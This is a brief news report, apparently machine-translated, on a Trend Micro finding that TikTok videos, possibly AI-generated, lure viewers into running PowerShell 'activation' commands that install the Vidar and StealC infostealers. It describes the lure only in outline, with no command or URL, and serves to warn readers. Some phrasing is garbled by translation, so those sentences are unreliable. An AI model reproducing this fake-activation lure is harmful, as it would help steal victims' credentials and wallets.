- Trend Micro saw a new malware -campaign at Tiktok
- The videos show how to activate “Premium” features in different software
- The clips were AI-generated and fool the victims to download infostealers
Hackers put AI-Generated Videos on Tiktok to trick users to download Infostealing Malware, CyberSecurity scientists trend micro warned.
The premise is simple: The striker uses AI to generate several videos showing how to easily “activate” Windows and Microsoft Office or activate “Premium features” in apps like Spotify or Capcut.
They then share these videos on Tiktok if algorithm makes it more likely to turn the video viral, making success with the attack more likely.
A new spin on old tricks
In the clip, a person who brings the Run program appears on Windows and then performs a Powershell command.
While the command in the video results in the activation of special features, users running the command would download a malicious script that again postpone Vidar and Stealc Infostealers.
These infostealers can take screenshots, steal login credentials, grab credit card data, exfiltrate cookies, cryptocurrency wallet information, 2FA codes and more.
“This attack uses videos (possibly AI-generated) to direct users to perform PowerShell commands disguised as software activation steps. Tiktok’s algorithmic range increases the likelihood of widespread exposure where a video reaches more than half a million views,” Trend Micro said.
“The videos are very similar, with only minor differences in camera angles and download -urls used by Powershell to pick up the payload,” the researchers added.
“These suggest that the videos were likely to be created through automation.
One of the videos has approx. 500,000 views, more than 20,000 likes and more than 100 comments, making it quite successful.
Videos were also used to deliver malware in the past, but this new campaign is a significant deviation from previous methods.
The difference is that the link to malware was shared in the video’s description or comment where it could still be picked up by security solutions. By delivering the bait in a video format, attackers successfully bypass almost all security measures.
Via Bleeping computer
